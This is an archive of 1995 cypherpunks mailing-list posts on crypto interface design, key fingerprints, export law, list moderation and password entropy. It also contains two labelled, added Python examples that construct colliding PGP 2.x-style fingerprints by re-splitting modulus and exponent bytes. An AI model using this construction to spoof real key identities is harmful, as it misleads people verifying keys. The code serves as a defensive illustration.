To: Carl Ellison <cme@TIS.COM>
Subject: Re: Design proposal: crypto-capable generic interface
In-Reply-To: <9511221641.AA14712@tis.com>
Message-ID: <Pine.SUN.3.91.951122094209.29001A-100000@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 22 Nov 1995, Carl Ellison wrote:

> >Date: Sat, 18 Nov 1995 00:42:21 -0800 (PST)
> >From: Raph Levien <raph@c2.org>
>
> >   I propose that the new interface lives as a sort of daemon, rather
> >than a static collection of command line script pieces. 
> 
> Danger, Will Robinson!  (see below)

   In retrospect, "daemon" was a poor choice of words to describe my
proposal. "Slave process" gets the idea across much better, but may be a
bit less PC. A daemon sits on a publicly accessible port, such as a TCP/IP
socket. The slave process is only accessible to the user who invoked it
(enforced by the OS's file permissions). Further, it only gives secrets to
individual processes that authenticated themselves first (by sending a
passphrase down the connection to the slave process). 

> >   Once the negotiation has been established, the application can send
> >the daemon MIME objects that the app does not understand but the
> >daemon does (for example, an image/fractal). The daemon can return a
> >MIME object that the app does understand (for example, an image/ppm).
> 
> This part sounds good...a sort of master translation service.

   I'm glad you like it!

> >   Alternatively, the daemon may request an authentication. This is
> >useful when resolving external bodies that require authentication,
> >including non-anonymous FTP, and standard authenticated HTTP. In this
> >case, the daemon sends a message to the app requesting the
> >authentication. It specifies whether it needs both username and
> >password, or just password. In the latter case, it hands a username to
> >the application.
> >   The application can then query the user for the authentication
> >data. It hands this back to the daemon. In reply, the daemon indicates
> >success or failure. In case of success, it hands the object back to
> >the app.
> 
> Now I get worried.  This communication with the demon is via some IPC --
> maybe even via a LAN.  Some things can't be distributed safely and
> authentication is #2 on my list.

   No, the communication is not via a LAN. On a Unix system, the 
communication is through Domain Sockets. Both processes live on the same 
machine, and the socket "lives" on the local file system.

   I submit that my proposal is every bit as secure as, say, PGP is now. 
If you can't trust the operating system not to hand domain sockets from 
one process to another, then you certainly can't trust it to, for 
example, substitute different binaries for the crypto program (an attack 
which Ian et al cleverly mounted a few weeks ago).
   If it were not the case that my proposal was as secure as PGP, then I 
would want to withdraw it. However, the proposal has so many advantages 
that I would want to see a serious description of the attack, rather than 
just feelings of endangerment to Will Robinson.

> >   Encryption is a bit more tricky, but in essence you just hang a
> >premail-alike off this kind of protocol. The hard part is specifying
> >the key, but you just call it a "parameter" and put in hooks for the
> >daemon to ask for whatever parameters it needs. 
> 
> Crypto keys are #1 on my list of things you can't distribute (unless they
> are wrapped, of course).

   I should have made it clearer that I am referring to public keys. If 
public keys are on the list of things that can't be distributed, then I 
believe we are in trouble.

> >						 This requires that
> >keys have some nonforgeable names, which is unfortunately not a
> >feature of PGP 2.6.2. S/MIME will do it just fine, if you buy into the
> >Certification Authority (<wink> at Nick Szabo).
> 
> Public keys, if that's what you're talking about, have perfectly good
> nonforgeable names -- themselves.  They are unique.  They are the proper
> name which can collect all the attributes of that key which are of interest
> (e.g., permission to spend $, name of a human who knows the private key,
> attributes about that human, etc.).

   Ok. But public keys have one serious disadvantage: their size. I can't 
put a public key on my business card or read it over the phone. I want an 
unforgeable key name. I want this to be the standard key name in the 
interface between the application and the crypto engine. I want users to 
be able to specify them directly, at the very least to bootstrap the 
public key infrastructure.
   I propose using the MD5 hash of the whitespace-free MOSS 
representation of the public key, in hex. It's simple enough to be 
described in one sentence, but does everything I want.

   Note that PGP 2.6.2 does _not_ allow the use of a public key as the 
name of a public key, unless you do a horrible hack such as replace the 
pubring.pgp file with the one public key of interest. This is a 
significant problem when trying to identify which key signed a signed 
message. I haven't bashed around with TISMOSS enough, but I'm not sure it 
will allow this either. I got the impression that it preferred the use of 
an alias.

> >   One final aside: I've been fairly frustrated with this mailing list
> >as a forum for talking about real design proposals and implementation
> >issues. Ignorant posts by the likes of Dr. Fred and Alice d'Clueless
> >tend to attract far more attention than real crypto work. I want a
> >forum for, and just for, cypherpunks who write code. If I had just a
> >smidgen more free time (as if), I'd be trying to start one
> >myself. Anyone else?
> 
> I've seen this happen several times.  As a list gets popular, it
> diversifies.  You might try sci.crypt.research -- since it's moderated.

   Thanks for the suggestion. However, my concerns are with 
implementation and deployment, not research.  I am perfectly willing to 
consider cryptographic algorithms to be black boxes that do what they say 
they will. I think the charter exists to start a new list. John Gilmore 
has already offered to start a "coderpunks" list on toad.com. Shall we 
take him up on it?

Raph
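
[Added example, not code from this thread or from PGP or MOSS: a sketch of the key name proposed in the message above (hex MD5 over a whitespace-free printable key), set beside a PGP 2.x-style fingerprint that hashes the modulus and exponent bytes without their lengths. The printable encoding is a stand-in rather than the real MOSS format, the key values are constructed, and all function names are hypothetical.]

```python
import base64
import hashlib

# Constructed sample values, not a real RSA key: a 512-bit "modulus" whose
# bytes are 0x80..0xBF, and the small exponent 17.
N = int.from_bytes(bytes(range(0x80, 0xC0)), "big")
E = 17


def mpi_body(x):
    """Big-endian bytes of x with no leading zero octet (no length field)."""
    return x.to_bytes((x.bit_length() + 7) // 8, "big")


def pgp2_fingerprint(n, e):
    """PGP 2.x style: MD5 over modulus bytes, then exponent bytes, unframed."""
    return hashlib.md5(mpi_body(n) + mpi_body(e)).hexdigest()


def sized_fingerprint(n, e):
    """Key size and fingerprint quoted together, e.g. '512/<hex>'."""
    return "%d/%s" % (n.bit_length(), pgp2_fingerprint(n, e))


def encode_key_text(n, e, width=32):
    """Stand-in printable key (assumption, NOT the MOSS format): each field
    is preceded by its 2-byte bit count, then base64, wrapped at `width`."""
    raw = b"".join(x.bit_length().to_bytes(2, "big") + mpi_body(x)
                   for x in (n, e))
    b64 = base64.b64encode(raw).decode("ascii")
    return "\n".join(b64[i:i + width] for i in range(0, len(b64), width))


def key_name(key_text):
    """Proposed name: hex MD5 of the key text with all whitespace removed,
    so re-wrapped or re-indented copies of one key get one name."""
    return hashlib.md5("".join(key_text.split()).encode("ascii")).hexdigest()


def resplit(n, e):
    """Move the modulus's last octet to the front of the exponent.

    The concatenated bytes do not change, so a hash without length fields
    cannot tell the two (modulus, exponent) pairs apart. Assumes the last
    octet of n is nonzero, which holds for any odd modulus.
    """
    e_len = len(mpi_body(e))
    return n >> 8, ((n & 0xFF) << (8 * e_len)) | e


def compare():
    """Return how each naming scheme treats the original and re-split key."""
    n2, e2 = resplit(N, E)
    return {
        "unframed_same": pgp2_fingerprint(N, E) == pgp2_fingerprint(n2, e2),
        "sized_same": sized_fingerprint(N, E) == sized_fingerprint(n2, e2),
        "framed_same": key_name(encode_key_text(N, E))
                       == key_name(encode_key_text(n2, e2)),
        "rewrap_same": key_name(encode_key_text(N, E, 32))
                       == key_name(encode_key_text(N, E, 7)),
    }


if __name__ == "__main__":
    for label, value in compare().items():
        print(label, value)
```

[The unframed fingerprint matches for both pairs, while the size-qualified fingerprint and the length-framed key name do not; a verifier that accepts a bare fingerprint should therefore also check the key size or hash an encoding that carries field lengths.]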






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Raph Levien <raph@c2.org>
Date: Thu, 23 Nov 1995 04:59:14 +0800
To: Carl Ellison <cme@TIS.COM>
Subject: Re: Design proposal: crypto-capable generic interface
In-Reply-To: <9511221840.AA24587@tis.com>
Message-ID: <Pine.SUN.3.91.951122111513.7498C-100000@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain




On Wed, 22 Nov 1995, Carl Ellison wrote:

> >Date: Wed, 22 Nov 1995 10:11:00 -0800 (PST)
> >From: Raph Levien <raph@c2.org>
> >Subject: Re: Design proposal: crypto-capable generic interface
> >Message-Id: <Pine.SUN.3.91.951122094209.29001A-100000@infinity.c2.org>
> 
> 
> 
> >   In retrospect, "daemon" was a poor choice of words to describe my
> >proposal. "Slave process" gets the idea across much better, 
> 
> I'm a great fan of programming by cooperating processes -- but I still
> worry when it comes to crypto.  What we need to do, if we want real
> security, is hold all the crypto secrets (therefore the crypto itself) in a
> device (PCMCIA card?)  in the physical possession of the user.  The
> cooperating-process model could make that easier -- but, if designed wrong,
> it could call for the device to give up a secret to be sent by IPC over to
> the slave process.

   What I am getting from you is "worry." This does not convince me. I
want solid technical criticism. Sorry for being so harsh, but that's how I
feel. 

   In fact, I propose that the security of the "slave process" model is
_better_ than the realistic alternatives. Without it, the application
stuff (for example, displaying pretty MIME content) and the crypto stuff
must share an address space. A bug in the application stuff could corrupt
or compromise the crypto data structures. As we have seen demonstrated
several times, it is just not practical to build large, complex
applications which are worthy of the highest level of trust. Factoring it 
into two processes helps.

   Tokens are nice, but I think there's a lot to be said for software 
solutions as well. At the very least, I don't consider the existence of 
tokens to be an argument that software crypto systems shouldn't be built.

> >> >						 This requires that
> >> >keys have some nonforgeable names, which is unfortunately not a
> >> >feature of PGP 2.6.2. S/MIME will do it just fine, if you buy into the
> >> >Certification Authority (<wink> at Nick Szabo).
> >> 
> >> Public keys, if that's what you're talking about, have perfectly good
> >> nonforgeable names -- themselves.  They are unique.  They are the proper
> >> name which can collect all the attributes of that key which are of interest
> >> (e.g., permission to spend $, name of a human who knows the private key,
> >> attributes about that human, etc.).
> >
> >   Ok. But public keys have one serious disadvantage: their size. 
> [...]
> 
> >   I propose using the MD5 hash of the whitespace-free MOSS 
> >representation of the public key, in hex. It's simple enough to be 
> >described in one sentence, but does everything I want.
> 
> That sounds fine -- but why deal with a text MOSS representation?  It's the
> modulus which is unique -- so just hash the binary bytes of the modulus,
> MSB first.  There's no need to force anyone checking a key to have all the
> MOSS printing software in the loop.  You might also consider using SHA
> instead of MD5 -- but that adds to the character count on your business
> card.  [I printed up my own business cards with PGP fingerprints for my 2
> primary keys -- and it took up about 1/4 of the card, in a readable font.]

   I would accept SHA as a reasonable alternative.

   Using the modulus alone is not good enough. A bogus key with the same 
modulus and a different exponent could be used to mount a 
denial-of-service attack. Note that the PGP 2.6.2 key fingerprint scheme 
suffers from a similar problem; since the sizes of the modulus and 
exponent fields are not included in the hash, it is possible to generate 
bogus keys with the same fingerprint. Specifying the key size and 
fingerprint together is, however, unforgeable.

I looked at the MOSS representation of the key (I'm talking PK's here
only, not all the X.509 stuff). I don't think it would be that hard to
code. 

> >   Note that PGP 2.6.2 does _not_ allow the use of a public key as the 
> >name of a public key, unless you do a horrible hack such as replace the 
> >pubring.pgp file with the one public key of interest.
> 
> PGP keyring structures do use the key as its own name, I believe.  The
> UserID is a separate entity, associated with the stand-alone key.  A
> signature applies to a pair (UserID,Key).

   I was referring to the interface that PGP presents to the outside 
world, not its internal keyring structures. These issues come up whenever 
using PGP from the command line, or trying to interface it with other 
applications.

> If I could change the PGP keyring structure, I'd add a new entity -- an
> Attribute block -- a string and my key ID, with a signature on the
> Attribute+ObjectKey.  This can be done today with the UserID and signature
> -- and I've even tried it.  It works, but PGP is used to accessing keys by
> the text in a UserID field and that's not appropriate.  The Attribute would
> give a statement I'm prepared to stand by, giving testimony about the key
> being signed or the person who has demonstrated the ability to sign
> something I've verified with that key.

   I understand that Matt Blaze's forthcoming "Policymaker" will do all 
this and more.

> We might need to add something like MOSS's aliases, for my use only, to let
> me access keys.  If I know someone as Bobby -- that's an association in my
> own head -- not applicable to anyone else.  When I access him by that
> alias, that's for my use.  Therefore, only I should define it and only I
> should sign the association.  This is what I'd use instead of PGP's
> UserID blocks -- alias blocks.
> 
> I commend TIS/MOSS's aliases to people's study.  The MOSS guys have used
> the alias structure not only to define nicknames of importance only to me
> but also to define crypto-lists (like mailing lists).
> 
> Needless to say, the assignment of aliases needs to be protected.  An
> attacker mustn't be allowed to slip a new alias and/or new key into your
> ring -- especially if it's a crypto-list definition.

   This is fine, but it's one more thing to manually maintain. How is the 
user going to verify that the alias is really right? This is another 
place where a 32- (or 40-) hex digit unique name would come in handy.

> >   Thanks for the suggestion. However, my concerns are with 
> >implementation and deployment, not research.  I am perfectly willing to 
> >consider cryptographic algorithms to be black boxes that do what they say 
> >they will. I think the charter exists to start a new list. John Gilmore 
> >has already offered to start a "coderpunks" list on toad.com. Shall we 
> >take him up on it?
> 
> My suggestion is that if you want this limited in content, it'll have to be
> moderated.

   I agree that a moderated list would be better, but I do not have the
time to do it myself.
   One suggestion that I think is very good is to moderate on the basis 
of sender, rather than message. The best way to do this 
would be to keep a keyring of "approved" senders, and match the signature 
of each message against the keyring. As I say, I'm not volunteering, but 
if somebody else was so moved, I think it would be a valuable service.

Raph





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sten Drescher <dreschs@mpd.tandem.com>
Date: Thu, 23 Nov 1995 02:07:10 +0800
To: cypherpunks@toad.com
Subject: Re: Pedophiles use encoding devices to make secret use of Internet
In-Reply-To: <Pine.BSD/.3.91.951121205509.15079A-100000@l0pht.com>
Message-ID: <199511221739.LAA28319@galil.austnsc.tandem.com>
MIME-Version: 1.0
Content-Type: text/plain



N> When I tried this URL I got:

N> 404 Not Found

N> The requested URL /newsroom/ntn/info/info429_4.html was not found on
N> this server.

	Nando seems to be having problems - I got the same error several
times following links on it.


-- 
#include <disclaimer.h>				/* Sten Drescher */
To get my PGP public key, send me email with your public key and
	Subject: PGP key exchange
Key fingerprint =  90 5F 1D FD A6 7C 84 5E  A9 D3 90 16 B2 44 C4 F3




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Simon Spero <ses@tipper.oit.unc.edu>
Date: Thu, 23 Nov 1995 04:21:54 +0800
To: tallpaul <tallpaul@pipeline.com>
Subject: Re: Secrets of the Internet
In-Reply-To: <199511221933.OAA12393@pipe1.nyc.pipeline.com>
Message-ID: <Pine.SOL.3.91.951122113850.23852D-100000@chivalry>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 22 Nov 1995, tallpaul wrote:
>  
> Turing killed himself after being dogged by the UK's intelligence
> establishment over his sexual orientation. Ain't no way they're going to
> unfreeze *him* to work on the issue of "kiddie porn."

You still believe that cover story? :-)






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Frank Stuart <fstuart@vetmed.auburn.edu>
Date: Thu, 23 Nov 1995 02:47:39 +0800
To: froomkin@law.miami.edu
Subject: Re: Spam the Sign!
Message-ID: <199511221816.MAA13933@snoopy.vetmed.auburn.edu>
MIME-Version: 1.0
Content-Type: text/plain


>[regarding suggestion that netscape give mit or someone a 128 bit version 
>to place on an ftp server]
>
>This is not an apology for the ITAR, just my usual lawyerly overcaution:
>
>Suppose A gives B a program that is export controlled, intending for B to 
>allow it to be exported.  Has A conspired with B to export the program?
>
>Let's ask the grand jury investigating Phil....

That's a possible problem, I suppose, but wouldn't you be protected if
your license agreement with MIT (or whoever) specified redistribution
"for domestic use only"?


                          | (Douglas) Hofstadter's Law:
Frank Stuart              | It always takes longer than you expect, even 
fstuart@vetmed.auburn.edu | when you take into account Hofstadter's Law.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal <hfinney@shell.portal.com>
Date: Thu, 23 Nov 1995 05:00:59 +0800
To: cypherpunks@toad.com
Subject: Re: towards a theory of reputation
In-Reply-To: <Pine.SUN.3.91.951121223454.2539A-100000@eskimo.com>
Message-ID: <199511222024.MAA09897@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


I don't have time to write much now, but I got a request for information
on the Prisoner's Dilemma problem, so I did a web search, and found an
interesting sounding paper at <URL:
http://www.cs.wisc.edu/~smucker/ipd-cr/ipd-cr.html>.  I have not read it
yet, but according to the web page this adds to the traditional PD
simulations the feature that participants can choose whom to interact
with (rather than having to interact with everyone or with a random other
program).  Maybe "reputation" would be more important in such a
simulation since the element of choice seems to be one of the key areas
where reputation matters.  I'll try to read the paper over the holidays,
but it sounds like it might be relevant.

Hal




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Thu, 23 Nov 1995 03:08:15 +0800
To: A.Back@exeter.ac.uk
Subject: Re: PROPOSAL: cypherpunks-news@toad.com? (was: rand-test)
In-Reply-To: <5579.199511221742@olib>
Message-ID: <199511221828.NAA21403@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



A.Back@exeter.ac.uk writes:
> It is much more efficient of list bandwidth to post short pointers
> only, of the style John Young <jya@pipeline.com> posts.

I agree with you.  John's posts are not always strictly on topic but
they are always just pointers, and he typically posts them in a single
group a day. They are also always very high quality information. I
find them to be perfectly fine. 

The recent "Friend;" stuff just annoyed me, though.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Carl Ellison <cme@TIS.COM>
Date: Thu, 23 Nov 1995 03:11:00 +0800
To: raph@c2.org
Subject: Re: Design proposal: crypto-capable generic interface
Message-ID: <9511221840.AA24587@tis.com>
MIME-Version: 1.0
Content-Type: text/plain


>Date: Wed, 22 Nov 1995 10:11:00 -0800 (PST)
>From: Raph Levien <raph@c2.org>
>Subject: Re: Design proposal: crypto-capable generic interface
>Message-Id: <Pine.SUN.3.91.951122094209.29001A-100000@infinity.c2.org>



>   In retrospect, "daemon" was a poor choice of words to describe my
>proposal. "Slave process" gets the idea across much better, 

I'm a great fan of programming by cooperating processes -- but I still
worry when it comes to crypto.  What we need to do, if we want real
security, is hold all the crypto secrets (therefore the crypto itself) in a
device (PCMCIA card?)  in the physical possession of the user.  The
cooperating-process model could make that easier -- but, if designed wrong,
it could call for the device to give up a secret to be sent by IPC over to
the slave process.


>> >						 This requires that
>> >keys have some nonforgeable names, which is unfortunately not a
>> >feature of PGP 2.6.2. S/MIME will do it just fine, if you buy into the
>> >Certification Authority (<wink> at Nick Szabo).
>> 
>> Public keys, if that's what you're talking about, have perfectly good
>> nonforgeable names -- themselves.  They are unique.  They are the proper
>> name which can collect all the attributes of that key which are of interest
>> (e.g., permission to spend $, name of a human who knows the private key,
>> attributes about that human, etc.).
>
>   Ok. But public keys have one serious disadvantage: their size. 
[...]

>   I propose using the MD5 hash of the whitespace-free MOSS 
>representation of the public key, in hex. It's simple enough to be 
>described in one sentence, but does everything I want.

That sounds fine -- but why deal with a text MOSS representation?  It's the
modulus which is unique -- so just hash the binary bytes of the modulus,
MSB first.  There's no need to force anyone checking a key to have all the
MOSS printing software in the loop.  You might also consider using SHA
instead of MD5 -- but that adds to the character count on your business
card.  [I printed up my own business cards with PGP fingerprints for my 2
primary keys -- and it took up about 1/4 of the card, in a readable font.]

>   Note that PGP 2.6.2 does _not_ allow the use of a public key as the 
>name of a public key, unless you do a horrible hack such as replace the 
>pubring.pgp file with the one public key of interest.

PGP keyring structures do use the key as its own name, I believe.  The
UserID is a separate entity, associated with the stand-alone key.  A
signature applies to a pair (UserID,Key).

If I could change the PGP keyring structure, I'd add a new entity -- an
Attribute block -- a string and my key ID, with a signature on the
Attribute+ObjectKey.  This can be done today with the UserID and signature
-- and I've even tried it.  It works, but PGP is used to accessing keys by
the text in a UserID field and that's not appropriate.  The Attribute would
give a statement I'm prepared to stand by, giving testimony about the key
being signed or the person who has demonstrated the ability to sign
something I've verified with that key.

We might need to add something like MOSS's aliases, for my use only, to let
me access keys.  If I know someone as Bobby -- that's an association in my
own head -- not applicable to anyone else.  When I access him by that
alias, that's for my use.  Therefore, only I should define it and only I
should sign the association.  This is what I'd use instead of PGP's
UserID blocks -- alias blocks.

I commend TIS/MOSS's aliases to people's study.  The MOSS guys have used
the alias structure not only to define nicknames of importance only to me
but also to define crypto-lists (like mailing lists).

Needless to say, the assignment of aliases needs to be protected.  An
attacker mustn't be allowed to slip a new alias and/or new key into your
ring -- especially if it's a crypto-list definition.


>   Thanks for the suggestion. However, my concerns are with 
>implementation and deployment, not research.  I am perfectly willing to 
>consider cryptographic algorithms to be black boxes that do what they say 
>they will. I think the charter exists to start a new list. John Gilmore 
>has already offered to start a "coderpunks" list on toad.com. Shall we 
>take him up on it?

My suggestion is that if you want this limited in content, it'll have to be
moderated.

 - Carl


 +--------------------------------------------------------------------------+
 |Carl M. Ellison      cme@tis.com    http://www.clark.net/pub/cme          |
 |Trusted Information Systems, Inc.   http://www.tis.com/                   |
 |3060 Washington Road          PGP 2.6.2:  61E2DE7FCB9D7984E9C8048BA63221A2|
 |Glenwood MD  21738         Tel:(301)854-6889      FAX:(301)854-5363       |
 +--------------------------------------------------------------------------+
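
Added example (not part of this message, of Raph Levien's reply to it, or of PGP or MOSS code): the three key-naming schemes debated in the two posts, compared on a constructed key. The function names and the sample values N and E are assumptions made for the illustration; MD5 is the default only because it is the hash the thread discusses.

```python
import hashlib

def mpi_body(x: int) -> bytes:
    """Big-endian bytes of x, most significant byte first, with no length field."""
    return x.to_bytes((x.bit_length() + 7) // 8, "big")

def fp_modulus_only(n: int, e: int, algo: str = "md5") -> str:
    """Hash of the modulus bytes alone; the exponent never enters the hash."""
    return hashlib.new(algo, mpi_body(n)).hexdigest()

def fp_unframed(n: int, e: int, algo: str = "md5") -> str:
    """PGP 2.6.2-style fingerprint: modulus bytes followed by exponent bytes,
    with the sizes of the two fields left out of the hash."""
    return hashlib.new(algo, mpi_body(n) + mpi_body(e)).hexdigest()

def fp_framed(n: int, e: int, algo: str = "md5") -> str:
    """Each field is preceded by its 16-bit bit count, so the boundary between
    modulus and exponent is part of the hashed data."""
    h = hashlib.new(algo)
    for x in (n, e):
        h.update(x.bit_length().to_bytes(2, "big"))
        h.update(mpi_body(x))
    return h.hexdigest()

def name_with_size(n: int, e: int, algo: str = "md5"):
    """The pair (modulus size in bits, unframed fingerprint)."""
    return n.bit_length(), fp_unframed(n, e, algo)

def resplit(n: int, e: int, shift: int):
    """Return a different (n', e') whose concatenated bytes equal those of (n, e),
    by moving the last `shift` modulus bytes to the front of the exponent.
    Used here to build a test vector for checking a fingerprint scheme."""
    nb, eb = mpi_body(n), mpi_body(e)
    if not 0 < shift < len(nb):
        raise ValueError("shift must leave at least one modulus byte")
    head, tail = nb[:-shift], nb[-shift:] + eb
    if tail[0] == 0:
        # A leading zero would be dropped on re-encoding and change the stream.
        raise ValueError("re-split exponent would start with a zero byte")
    return int.from_bytes(head, "big"), int.from_bytes(tail, "big")

# Constructed sample values: a 512-bit number standing in for a modulus
# (bytes 0x80..0xBF) and a small exponent. Not a real key.
N = int.from_bytes(bytes(range(0x80, 0xC0)), "big")
E = 17

if __name__ == "__main__":
    n2, e2 = resplit(N, E, 1)
    print("modulus only, e=17 vs e=3 :",
          fp_modulus_only(N, 17) == fp_modulus_only(N, 3))
    print("unframed, original vs re-split:",
          fp_unframed(N, E) == fp_unframed(n2, e2))
    print("framed, original vs re-split  :",
          fp_framed(N, E) == fp_framed(n2, e2))
    print("size + fingerprint            :",
          name_with_size(N, E), name_with_size(n2, e2))
```

Switching the hash (for example `algo="sha1"`) does not change the outcome for the unframed scheme, because the ambiguity is in what is hashed, not in the hash function.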




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Martin Diehl" <mdiehl@dttus.com>
Date: Thu, 23 Nov 1995 04:13:58 +0800
To: cypherpunks@toad.com
Subject: PROPOSAL: cypherpunks-news@toad.com?
Message-ID: <9510228170.AA817074264@cc3.dttus.com>
MIME-Version: 1.0
Content-Type: text/plain


     On 11/22/95, Adam Writes:
     
     > Perry Metzger <perry@piermont.com> writes:
     > > "James M. Cobb" writes:
     > > > Friend, 
     > > >  
     > > >  
     > > > The following information from 
     > > 
     > > 1) You are not my friend.
     > > 
     > > 2) My private mail to you hasn't convinced you to stop this
     > > barrage of reposts. Would you please do so?
     
     > I am inclined to agree with Perry in as much as the volume of posts 
     > to the cypherpunks list is greatly increased by reposts of news from 
     > other mailing lists, USENET newsgroups, WWW sources, newspapers, TV 
     > programs, films, books, talks, etc.  While some of the information
     > posted is interesting, and relevant, some others are less relevant, 
     > bordering on noise.
     
     [SNIP]
     
     > The proposal: a separate list for current-event
     > reports/news/reposts.
     
     [SNIP]
     
     > What do others think?
     
     > Adam
     
     This is what I think about setting up an additional list:
     
     1. If I subscribe to both lists, it won't change my eMail traffic
     
     2. If the "news, NOISE, off-topic" posts are sent to both lists, my 
     eMail volume will increase
     
     3. The cypherpunks subscribers are not the problem
     
     4. What Adam and Perry (and others) want is that the "news, NOISE, 
     off-topic" posters change their behavior and not post long news items 
     verbatim.
     
     5. How are you going to get those posters to agree to change?
     
     My vote, for what it's worth, is don't split the list.  It won't work 
     because the extra posts ARE going to go to this list because that's 
     where they believe their readers are.
     
     Martin G. Diehl
     





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tallpaul@pipeline.com (tallpaul)
Date: Thu, 23 Nov 1995 04:42:43 +0800
To: Simon Spero <ses@tipper.oit.unc.edu>
Subject: Re: Secrets of the Internet
Message-ID: <199511221933.OAA12393@pipe1.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


On Wed. 22 Nov 1995 Simon Spero wrote in "Re: Secrets of the Internet" that
we should "never underestimate the power of GCHQ -- when they unfreeze Alan
Turing from the cryogenic vault, good things happen." 
 
Not to worry. 
 
Turing killed himself after being dogged by the UK's intelligence
establishment over his sexual orientation. Ain't no way they're going to
unfreeze *him* to work on the issue of "kiddie porn."




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Froomkin <froomkin@law.miami.edu>
Date: Thu, 23 Nov 1995 04:36:28 +0800
To: Frank Stuart <fstuart@vetmed.auburn.edu>
Subject: Re: Spam the Sign!
In-Reply-To: <199511221816.MAA13933@snoopy.vetmed.auburn.edu>
Message-ID: <Pine.SUN.3.91.951122145559.24028D-100000@viper.law.miami.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 22 Nov 1995, Frank Stuart wrote:

> >[regarding suggestion that netscape give mit or someone a 128 bit version 
> >to place on an ftp server]
> >
> >This is not an apology for the ITAR, just my usual lawyerly overcaution:
> >
> >Suppose A gives B a program that is export controlled, intending for B to 
> >allow it to be exported.  Has A conspired with B to export the program?
> >
> >Let's ask the grand jury investigating Phil....
> 
> That's a possible problem, I suppose, but wouldn't you be protected if
> your license agreement with MIT (or whoever) specified redistribution
> "for domestic use only"?
> 
"protected"? No.  "Helped"? Yes.  The government can argue to the jury 
that the agreement was a sham and you knew it....

A. Michael Froomkin        | +1 (305) 284-4285; +1 (305) 284-6506 (fax)
Associate Professor of Law | 
U. Miami School of Law     | froomkin@law.miami.edu
P.O. Box 248087            | http://www.law.miami.edu/~froomkin
Coral Gables, FL 33124 USA | It's warm here.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Scott Brickner <sjb@universe.digex.net>
Date: Thu, 23 Nov 1995 05:43:33 +0800
To: tcmay@got.net (Timothy C. May)
Subject: Re: Repeated Words/characters in Password/Phrase
In-Reply-To: <acce4e6b00021004573a@[205.199.118.202]>
Message-ID: <199511222102.QAA10377@universe.digex.net>
MIME-Version: 1.0
Content-Type: text/plain


Timothy C. May writes:
>At 11:11 PM 11/14/95, Ted Cabeen wrote:
>>Do repeated words in a PGP passphrase make the pass phrase less secure than
>>a passphrase without any repeated words?  And on the same note, do repeated
>>letters in a UNIX password make that password easier to break? I can't seem
>>to find anything in my books on cryptography that mention this.  Thanks.
>
>More of an information theory question than a crypto question. There are no
>simple answers to this question, but some examples will help:
>
>The password "foo" is not very good, and "foofoo" is only slightly better.
>And "foofoofoo" is slightly better, and so on, to a point. But
>"foofoo....foo" is not N times better than a single "foo," because the
>_pattern_ is simply described: "repeat "foo" N times." Thus, the information
>content or entropy of "foofoofoo....foo" is not N times greater than the
>entropy of "foo."
>
>Some dictionary attacks which would trivially find "foo" will not find
>"foofoo," or "foofoofoo," etc., so this could be a great help. More
>sophisticated dictionary attacks may of course take the 30,000 or so most
>common names, words, places, and then do various permutations, reversals,
>repetitions, etc.
>
>So this is why there is not likely to be a simple answer to your question.
>Repeating words in a passphrase can make the passphrase easier to remember
>(such as "thequickquickbrownfox") and make certain kinds of attacks harder,
>but with not as much of an increase in entropy as the increased number of
>raw characters might otherwise suggest.
>
>Other "heuristics" (simple rules of thumb) for passphrases are contained in
>the PGP documents, and in numerous other places: avoid names, add
>nonstandard English keyboard characters liberally (even if using real
>words), etc. The "best" passphrases, it almost goes without saying, are the
>longest and most "unpredictable," so that "7f#qp)djQ10hB%3t+1?U4SVp5" is
>much superior to "%foo%foo".

I don't buy this argument.  The only reason "foofoo" could have less
entropy than "foobar" is if the attacker had some reason to know that
the user tends to choose doubled passwords, or something like that.

If the user has historically chosen passwords with roughly six bits of
entropy per character, then "foofoo" is exactly as likely as "foobar",
and is no "weaker" from an information-theoretic perspective.

In fact, information theory would generally note that discarding the
"foofoo" choice slightly reduces the entropy in the password.

It is also worth noting that any good password algorithm doesn't permit
one to determine if the password is _partly_ right, so entropy
measurements can't really meaningfully be made on a per-character
basis, only on the password as a whole.

It is because the attacker knows that many (if not most) users tend to
prefer passwords that are "easier to remember" that leads him to try
the more memorable combinations *first*.  The information-theoretic
interpretation of this is that such memorable passwords have less
entropy than the others, because the probability that the next account
an attacker tries to guess uses a memorable password is higher than the
probability that it doesn't.

"foobar" occurs as a password less frequently than "foofoo", so it has
more entropy.  The extra entropy didn't come from the use of more
characters, it came from all the more lazy users who like "foofoo"
better.

To use a variant of Tim's example, "7f#qp)djQ10hB%3t+1?U4SVp5" is not
measurably better than "7f#q#)d#Q10h#%#t+1#U4S#p5", even though the
latter uses the "#" character much more frequently than the first.
Both passwords are so far down the list that they probably have never
occurred as passwords.  Both contain effectively the same entropy.

To address the original question:
>>Do repeated words in a PGP passphrase make the pass phrase less secure than
>>a passphrase without any repeated words?

Probably not.  It may even increase security, as "the quick brown fox"
is more frequently used than "the quick quick brown fox" as someone's
password, and should, therefore, be tried first.

>>And on the same note, do repeated
>>letters in a UNIX password make that password easier to break?

Again, probably not.  If the letters are generally chosen at random,
then "abafraa" is just as likely to occur as "abifryu".  If the letters
are chosen less randomly, like from a name, then "anna" is more likely
than "xavier", but less likely than "john".
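
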